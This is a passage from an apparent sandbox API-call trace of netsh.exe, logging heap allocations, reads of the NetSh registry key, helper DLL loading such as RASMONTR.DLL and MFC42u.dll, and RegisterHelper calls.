Size=0x10) returned 0x2e17c0 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e17e0 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1800 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1820 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1840 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1860 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e18c0 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e18e0 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1900 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1920 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1940 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1960 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1980 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e19a0 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e19c0 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e19e0 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a00 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a20 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a40 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a60 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a80 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1aa0 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ac0 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ae0 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b00 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b20 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b40 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b60 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b80 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ba0 [0117.135] GetProcessHeap () returned 0x2c0000 [0117.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1bc0 [0117.135] GetProcessHeap () returned 0x2c0000 [0117.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1be0 [0117.135] GetProcessHeap () returned 0x2c0000 [0117.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c00 [0117.136] GetProcessHeap () returned 0x2c0000 [0117.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c20 [0117.136] GetProcessHeap () returned 0x2c0000 [0117.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c40 [0117.136] GetProcessHeap () returned 0x2c0000 [0117.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c60 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c80 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ca0 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1cc0 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ce0 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d00 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d20 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d40 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d60 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d80 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1da0 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1dc0 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1de0 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e00 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e20 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e40 [0117.140] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e60 [0117.140] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e80 [0117.140] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ea0 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ec0 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ee0 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f00 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f20 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f40 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f60 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f80 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1fa0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1fc0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1fe0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2000 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2020 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2040 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2060 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e20c0 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e20e0 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2100 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2120 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2140 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2160 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2180 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e21a0 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e21c0 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e21e0 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2200 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2220 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2240 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2260 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2280 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e22a0 [0117.147] GetProcessHeap () returned 0x2c0000 [0117.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e22c0 [0117.147] GetProcessHeap () returned 0x2c0000 [0117.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e22e0 [0117.147] GetProcessHeap () returned 0x2c0000 [0117.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2300 [0117.148] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0117.148] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0117.148] GetProcessHeap () returned 0x2c0000 [0117.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2de060 [0117.148] GetProcessHeap () returned 0x2c0000 [0117.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x2e2890 [0117.149] GetProcessHeap () returned 0x2c0000 [0117.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2e2320 [0117.149] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0117.149] GetProcessHeap () returned 0x2c0000 [0117.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0117.150] GetProcessHeap () returned 0x2c0000 [0117.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x2e28b0 [0117.150] GetProcessHeap () returned 0x2c0000 [0117.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0117.151] GetProcessHeap () returned 0x2c0000 [0117.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x2e2910 [0117.205] GetProcessHeap () returned 0x2c0000 [0117.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e28b0 | out: hHeap=0x2c0000) returned 1 [0117.206] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x1474a8 | out: phkResult=0x1474a8*=0x90) returned 0x0 [0117.206] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1474d0, lpcbMaxValueNameLen=0x1474e0, lpcbMaxValueLen=0x1474d8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1474d0*=0x15, lpcbMaxValueNameLen=0x1474e0, lpcbMaxValueLen=0x1474d8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0117.206] GetProcessHeap () returned 0x2c0000 [0117.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e2340 [0117.207] GetProcessHeap () returned 0x2c0000 [0117.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x23) returned 0x2de090 [0117.207] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="4", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0117.207] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0117.207] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0117.207] GetProcessHeap () returned 0x2c0000 [0117.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2e28b0 [0117.208] GetProcessHeap () returned 0x2c0000 [0117.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2e29d0 [0117.208] GetProcessHeap () returned 0x2c0000 [0117.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2de0c0 [0117.208] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0117.209] GetProcessHeap () returned 0x2c0000 [0117.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de060 | out: hHeap=0x2c0000) returned 1 [0117.209] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fefbc80000 [0132.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x146ea0 | out: lpSystemTimeAsFileTime=0x146ea0*(dwLowDateTime=0x3223cd80, dwHighDateTime=0x1d5f7c9)) [0132.924] GetCurrentProcessId () returned 0x4fc [0132.924] GetCurrentThreadId () returned 0x570 [0132.924] GetTickCount () returned 0x114c5ee [0132.924] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x146ea8 | out: lpPerformanceCount=0x146ea8*=23894766598) returned 1 [0133.135] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefdee0000 [0133.145] GetVersion () returned 0x1db10106 [0133.145] SetErrorMode (uMode=0x0) returned 0x0 [0133.146] SetErrorMode (uMode=0x8001) returned 0x0 [0133.200] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x2e4360 [0133.201] LocalFree (hMem=0x2e4360) returned 0x0 [0133.201] GetVersion () returned 0x1db10106 [0133.250] GlobalLock (hMem=0xb80008) returned 0x2e4360 [0133.313] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2e4580 [0133.314] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2e3080 [0133.314] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2e2360 [0133.315] malloc (_Size=0x100) returned 0x277c80 [0133.315] __dllonexit () returned 0x7fef443621c [0133.315] __dllonexit () returned 0x7fef44366e0 [0133.577] __dllonexit () returned 0x7fef44372b8 [0133.599] __dllonexit () returned 0x7fef44387cc [0133.599] __dllonexit () returned 0x7fef4438d64 [0133.599] __dllonexit () returned 0x7fef4438db4 [0133.600] __dllonexit () returned 0x7fef4438e70 [0133.600] __dllonexit () returned 0x7fef443a308 [0133.601] __dllonexit () returned 0x7fef4438810 [0133.628] __dllonexit () returned 0x7fef4447598 [0133.628] __dllonexit () returned 0x7fef4438880 [0133.629] __dllonexit () returned 0x7fef443a170 [0133.629] __dllonexit () returned 0x7fef443a280 [0133.630] __dllonexit () returned 0x7fef443ad44 [0133.630] __dllonexit () returned 0x7fef443bc30 [0133.630] __dllonexit () returned 0x7fef443bc80 [0133.631] __dllonexit () returned 0x7fef443c338 [0133.631] __dllonexit () returned 0x7fef443d030 [0133.631] __dllonexit () returned 0x7fef44359cc [0133.631] __dllonexit () returned 0x7fef44359f0 [0133.632] __dllonexit () returned 0x7fef4435a1c [0133.640] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0135.719] __dllonexit () returned 0x7fef4447568 [0135.720] __dllonexit () returned 0x7fef4447574 [0135.720] __dllonexit () returned 0x7fef4447580 [0135.721] __dllonexit () returned 0x7fef444758c [0135.721] GetVersion () returned 0x1db10106 [0135.721] GetVersion () returned 0x1db10106 [0135.722] GetVersion () returned 0x1db10106 [0135.722] __dllonexit () returned 0x7fef439a15c [0135.723] __dllonexit () returned 0x7fef43a6610 [0135.723] __dllonexit () returned 0x7fef4438910 [0135.723] __dllonexit () returned 0x7fef4438b90 [0135.724] __dllonexit () returned 0x7fef4438bb4 [0135.724] __dllonexit () returned 0x7fef43b6ae0 [0135.730] GetVersion () returned 0x1db10106 [0135.731] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0135.955] GetSystemMetrics (nIndex=11) returned 32 [0135.955] GetSystemMetrics (nIndex=12) returned 32 [0135.956] GetSystemMetrics (nIndex=2) returned 17 [0135.956] GetSystemMetrics (nIndex=3) returned 17 [0135.956] GetDC (hWnd=0x0) returned 0x90109ef [0135.957] GetDeviceCaps (hdc=0x90109ef, index=88) returned 96 [0135.957] GetDeviceCaps (hdc=0x90109ef, index=90) returned 96 [0135.957] ReleaseDC (hWnd=0x0, hDC=0x90109ef) returned 1 [0135.957] GetSysColor (nIndex=15) returned 0xf0f0f0 [0135.957] GetSysColor (nIndex=16) returned 0xa0a0a0 [0135.957] GetSysColor (nIndex=20) returned 0xffffff [0135.957] GetSysColor (nIndex=18) returned 0x0 [0135.957] GetSysColor (nIndex=6) returned 0x646464 [0135.958] GetSysColorBrush (nIndex=15) returned 0x1100059 [0135.958] GetSysColorBrush (nIndex=6) returned 0x1100061 [0135.958] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0135.958] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0135.959] __dllonexit () returned 0x7fef4438f84 [0135.959] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0136.290] __dllonexit () returned 0x7fef43c3990 [0136.290] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0136.509] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0136.509] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0136.509] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0136.509] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0136.510] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0136.510] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0136.510] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0136.512] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0136.512] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0136.512] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0136.513] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0136.514] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0136.515] __dllonexit () returned 0x7fef44475a4 [0136.515] __dllonexit () returned 0x7fef44475bc [0136.517] __dllonexit () returned 0x7fef44475c8 [0136.518] __dllonexit () returned 0x7fef44475d4 [0136.519] __dllonexit () returned 0x7fef44475e0 [0136.520] GetCursorPos (in: lpPoint=0x7fef44a26d8 | out: lpPoint=0x7fef44a26d8*(x=1256, y=516)) returned 1 [0136.521] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2e48d0 [0136.521] LocalReAlloc (hMem=0x2e2360, uBytes=0x18, uFlags=0x2) returned 0x2e49e0 [0136.522] GetCurrentThread () returned 0xfffffffffffffffe [0136.522] GetCurrentThreadId () returned 0x570 [0136.522] __dllonexit () returned 0x7fef443cfa4 [0136.523] SetErrorMode (uMode=0x0) returned 0x8001 [0136.523] SetErrorMode (uMode=0x8001) returned 0x0 [0136.525] GetModuleFileNameW (in: hModule=0x7fef4380000, lpFilename=0x146590, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0136.525] wcscpy_s (in: _Destination=0x1467a0, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0136.558] FindResourceW (hModule=0x7fef4380000, lpName=0xe01, lpType=0x6) returned 0x2409b0 [0137.215] LoadStringW (in: hInstance=0x7fef4380000, uID=0xe000, lpBuffer=0x1469b0, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0137.216] wcscpy_s (in: _Destination=0x1465c4, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0137.216] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0137.532] malloc (_Size=0x80) returned 0x277e90 [0137.533] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2e4a00 [0137.534] GetSystemDirectoryA (in: lpBuffer=0x146c30, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0137.534] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0137.534] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0137.535] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0137.535] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0138.139] GetProcAddress (hModule=0x7fefbc80000, lpProcName="InitHelperDll") returned 0x7fefbc9cf70 [0138.139] InitHelperDll () returned 0x0 [0138.141] RegisterHelper () returned 0x0 [0138.141] GetProcessHeap () returned 0x2c0000 [0138.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2e6b10 [0138.141] GetProcessHeap () returned 0x2c0000 [0138.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2910 | out: hHeap=0x2c0000) returned 1 [0138.384] RegisterHelper () returned 0x0 [0138.384] GetProcessHeap () returned 0x2c0000 [0138.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x160) returned 0x2e6c20 [0138.385] GetProcessHeap () returned 0x2c0000 [0138.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6b10 | out: hHeap=0x2c0000) returned 1 [0138.385] RegisterHelper () returned 0x0 [0138.385] GetProcessHeap () returned 0x2c0000 [0138.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1b8) returned 0x2e6d90 [0138.386] GetProcessHeap () returned 0x2c0000 [0138.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6c20 | out: hHeap=0x2c0000) returned 1 [0138.386] RegisterHelper () returned 0x0 [0138.386] GetProcessHeap () returned 0x2c0000 [0138.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2e6b10 [0138.386] GetProcessHeap () returned 0x2c0000 [0138.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6d90 | out: hHeap=0x2c0000) returned 1 [0138.387] RegisterHelper () returned 0x0 [0138.387] GetProcessHeap () returned 0x2c0000 [0138.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x268) returned 0x2e6d30 [0138.387] GetProcessHeap () returned 0x2c0000 [0138.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6b10 | out: hHeap=0x2c0000) returned 1 [0138.388] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nshwfp", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0138.388] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0138.388] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0138.388] GetProcessHeap () returned 0x2c0000 [0138.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x78) returned 0x2e2910 [0138.389] GetProcessHeap () returned 0x2c0000 [0138.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe) returned 0x2e2360 [0138.389] GetProcessHeap () returned 0x2c0000 [0138.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 